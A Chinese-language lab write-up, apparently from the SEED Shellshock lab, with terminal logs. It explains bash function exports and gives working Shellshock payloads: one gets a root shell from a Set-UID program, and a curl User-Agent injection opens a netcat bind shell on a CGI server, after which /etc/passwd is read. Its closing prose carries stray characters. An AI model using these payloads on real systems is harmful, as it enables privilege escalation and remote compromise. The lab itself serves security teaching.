Shellshock Attack

概述
認(rèn)識(shí)環(huán)境變量&&bash
1.普通shell變量和bash

[04/12/2018 09:26] seed@ubuntu:~/Seed/shellshock$ gu="hacker"
[04/12/2018 09:26] seed@ubuntu:~/Seed/shellshock$ echo $gu
hacker
[04/12/2018 09:26] seed@ubuntu:~/Seed/shellshock$ bash
[04/12/2018 09:27] seed@ubuntu:~/Seed/shellshock$ echo $gu

[04/12/2018 09:27] seed@ubuntu:~/Seed/shellshock$ exit
exit
[04/12/2018 09:27] seed@ubuntu:~/Seed/shellshock$

從上述實(shí)驗(yàn)中我們得出結(jié)論:bash子進(jìn)程沒(méi)有繼承普通shell變量gu.

2.普通環(huán)境變量和bash

[04/12/2018 09:31] seed@ubuntu:~/Seed/shellshock$ echo $gu
hacker
[04/12/2018 09:32] seed@ubuntu:~/Seed/shellshock$ export gu
[04/12/2018 09:32] seed@ubuntu:~/Seed/shellshock$ bash
[04/12/2018 09:32] seed@ubuntu:~/Seed/shellshock$ echo $gu
hacker
[04/12/2018 09:32] seed@ubuntu:~/Seed/shellshock$ exit
exit
[04/12/2018 09:32] seed@ubuntu:~/Seed/shellshock$

從上述實(shí)驗(yàn)中我們得出結(jié)論:bash子進(jìn)程繼承環(huán)境變量gu.

3.函數(shù)shell變量和bash

[04/12/2018 09:37] seed@ubuntu:~/Seed/shellshock$ gu() { echo "gu is a hacker";}
[04/12/2018 09:37] seed@ubuntu:~/Seed/shellshock$ gu
gu is a hacker
[04/12/2018 09:38] seed@ubuntu:~/Seed/shellshock$ bash
[04/12/2018 09:38] seed@ubuntu:~/Seed/shellshock$ gu
gu: command not found
[04/12/2018 09:38] seed@ubuntu:~/Seed/shellshock$ exit
exit
[04/12/2018 09:38] seed@ubuntu:~/Seed/shellshock$

從上述實(shí)驗(yàn)中我們得出結(jié)論:bash子進(jìn)程沒(méi)有繼承函數(shù)shell變量gu.

4.函數(shù)環(huán)境變量和bash

[04/12/2018 09:41] seed@ubuntu:~/Seed/shellshock$ gu
gu is a hacker
[04/12/2018 09:41] seed@ubuntu:~/Seed/shellshock$ export -f gu
[04/12/2018 09:41] seed@ubuntu:~/Seed/shellshock$ bash
[04/12/2018 09:42] seed@ubuntu:~/Seed/shellshock$ gu
gu is a hacker
[04/12/2018 09:42] seed@ubuntu:~/Seed/shellshock$ exit
exit
[04/12/2018 09:42] seed@ubuntu:~/Seed/shellshock$ env | grep gu
gu=hacker
gu=() {  echo "gu is a hacker"
[04/12/2018 09:42] seed@ubuntu:~/Seed/shellshock$

從上述實(shí)驗(yàn)中我們得出結(jié)論:bash子進(jìn)程繼承了函數(shù)環(huán)境變量gu.

5.再探普通環(huán)境變量和bash

[04/12/2018 09:42] seed@ubuntu:~/Seed/shellshock$ ailx10='() {  echo "ailx10 is a hacker";}'
[04/12/2018 09:48] seed@ubuntu:~/Seed/shellshock$ export -nf gu
[04/12/2018 09:48] seed@ubuntu:~/Seed/shellshock$ export -n gu
[04/12/2018 09:49] seed@ubuntu:~/Seed/shellshock$ export -f ailx10
bash: export: ailx10: not a function
[04/12/2018 09:49] seed@ubuntu:~/Seed/shellshock$ export ailx10
[04/12/2018 09:49] seed@ubuntu:~/Seed/shellshock$ bash
[04/12/2018 09:50] seed@ubuntu:~/Seed/shellshock$ ailx10
ailx10 is a hacker
[04/12/2018 09:50] seed@ubuntu:~/Seed/shellshock$ env | grep ailx10
ailx10=() {  echo "ailx10 is a hacker"
[04/12/2018 09:50] seed@ubuntu:~/Seed/shellshock$ exit
exit
[04/12/2018 09:50] seed@ubuntu:~/Seed/shellshock$ env | grep ailx10
ailx10=() {  echo "ailx10 is a hacker";}
[04/12/2018 09:50] seed@ubuntu:~/Seed/shellshock$

從上述實(shí)驗(yàn)中我們得出結(jié)論:bash子進(jìn)程誤把普通環(huán)境變量(){ :; }當(dāng)做函數(shù)環(huán)境變量處理了.

6.() { :;}再探

[04/12/2018 09:57] seed@ubuntu:~/Seed/shellshock$ ailx10='() { :; };/bin/ls'
[04/12/2018 09:58] seed@ubuntu:~/Seed/shellshock$ export ailx10
[04/12/2018 09:58] seed@ubuntu:~/Seed/shellshock$ bash
curl-7.20.0     myls      myls.c      myprog.cgi.1  readme.txt
curl-7.20.0.tar.gz  myls-notroot  myprog.cgi  myprog.cgi.2
[04/12/2018 09:58] seed@ubuntu:~/Seed/shellshock$ exit
exit
[04/12/2018 09:58] seed@ubuntu:~/Seed/shellshock$

從上述實(shí)驗(yàn)中我們得出結(jié)論:bash子進(jìn)程處理了/bin/ls.

綜上所述觸發(fā)bash漏洞可以歸納如下

1. 產(chǎn)生新的bash
2. 通過(guò)環(huán)境變量傳遞
3. 環(huán)境變量以() {}這樣的形式

如何用一條語(yǔ)句驗(yàn)證bash漏洞?

[04/12/2018 10:14] seed@ubuntu:~/Seed/shellshock$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
[04/12/2018 10:14] seed@ubuntu:~/Seed/shellshock$ 
[04/12/2018 10:14] seed@ubuntu:~/Seed/shellshock$ 
[04/12/2018 10:14] seed@ubuntu:~/Seed/shellshock$ env x='() { :;}; echo vulnerable' bash -c :
vulnerable
[04/12/2018 10:14] seed@ubuntu:~/Seed/shellshock$

注意: :什么都不做,在這里和true等價(jià)

$ if true; then echo yes; fi
yes
$ if :; then echo yes; fi
yes
$

env可以創(chuàng)建臨時(shí)環(huán)境變量.

bash -c可以運(yùn)行一個(gè)shell命令.

$ bash -c 'echo hi'
hi
$ bash -c 'echo $t'

$ env t=exported bash -c 'echo $t'
exported
$

攻擊Set-UID程序
將sh軟鏈接到我們有漏洞的bash:sudo ln -sf /bin/bash /bin/sh

看一個(gè)簡(jiǎn)單的c程序,功能等同與shell命令ls:

#include <stdio.h>
void main()
{
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
}

導(dǎo)入我們的環(huán)境變量
export gu='() { :;};/bin/sh'
編譯運(yùn)行上面的小程序
設(shè)置Set-UID和不設(shè)置Set-UID的運(yùn)行結(jié)果如下:

[04/12/2018 10:36] seed@ubuntu:~/Seed/shellshock$ export gu='() { :;};/bin/sh'
[04/12/2018 10:36] seed@ubuntu:~/Seed/shellshock$ ./myls
sh-4.2#
sh-4.2# whoami
root
sh-4.2# pwd
/home/seed/Seed/shellshock
sh-4.2# ls
curl-7.20.0     myls      myls.c      myprog.cgi.1  readme.txt
curl-7.20.0.tar.gz  myls-notroot  myprog.cgi  myprog.cgi.2
sh-4.2#
sh-4.2#
sh-4.2# exit
exit
[04/12/2018 10:37] seed@ubuntu:~/Seed/shellshock$ ./myls-notroot 
sh-4.2$ 
sh-4.2$ whoami
seed
sh-4.2$ exit
exit
[04/12/2018 10:38] seed@ubuntu:~/Seed/shellshock$

通過(guò)實(shí)驗(yàn)結(jié)果我們可以得出結(jié)論:我們獲得了一個(gè)root shell和一個(gè)普通shell.

攻擊CGI程序
1.創(chuàng)建CGI程序
創(chuàng)建myprog.cgi,將文件放入/usr/lib/cgi-bin/目錄中,設(shè)置可執(zhí)行權(quán)限755,

開(kāi)啟apache.通過(guò)瀏覽器訪問(wèn)127.0.0.1/cgi-bin/myprog.cgi試一試.

再試一試curl http://127.0.0.1/cgi-bin/myprog.cgi.

#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

2.獲取網(wǎng)站控制權(quán)限

虛擬機(jī)的IP地址:192.168.59.142/24
主機(jī)的IP地址:192.168.59.1/24

觸發(fā)網(wǎng)站的shellshock: curl -A "() { :;};echo; /bin/nc -lp 10086 -c bash" http://192.168.59.142/cgi-bin/myprog.cgi

黑客的主機(jī)控制了肉雞:

root@gt:/home/git/Keep-learning/mySeedLab# nc 192.168.59.142 10086
whoami
www-data
pwd
/usr/lib/cgi-bin
ls
my2.cgi
myprog.cgi
php
php5
cat /etc/passwd
...
hacker:x:1002:1003::/home/hacker:/bin/sh
gu:x:1001:1004::/home/gu:/bin/sh

注意:

1. 主機(jī)和虛擬機(jī)能夠互相Ping通
2. 主機(jī)可以通過(guò)瀏覽器訪問(wèn)虛擬機(jī)中的網(wǎng)站
3. nc使用netcat-traditional替換netcat-openbsd
4. 更多Linux shell命令可以訂閱我的專欄ath0的Linux筆記

原理:

Shellshock的原理是利用了Bash在導(dǎo)入環(huán)境變量函數(shù)時(shí)候的漏洞怒竿，啟動(dòng)Bash的時(shí)候，它不但會(huì)導(dǎo)入這個(gè)函數(shù)榔昔，而且也會(huì)把函數(shù)定義后面的命令執(zhí)行。

在有些CGI腳本的設(shè)計(jì)中芹关，數(shù)據(jù)是通過(guò)環(huán)境變量來(lái)傳遞的，這樣就給了數(shù)據(jù)提供者利用Shellshock漏洞的機(jī)會(huì)战得。

HTTP協(xié)議的頭User-Agent通常是通過(guò)環(huán)境變量HTTP_USER_AGENT來(lái)傳遞的充边。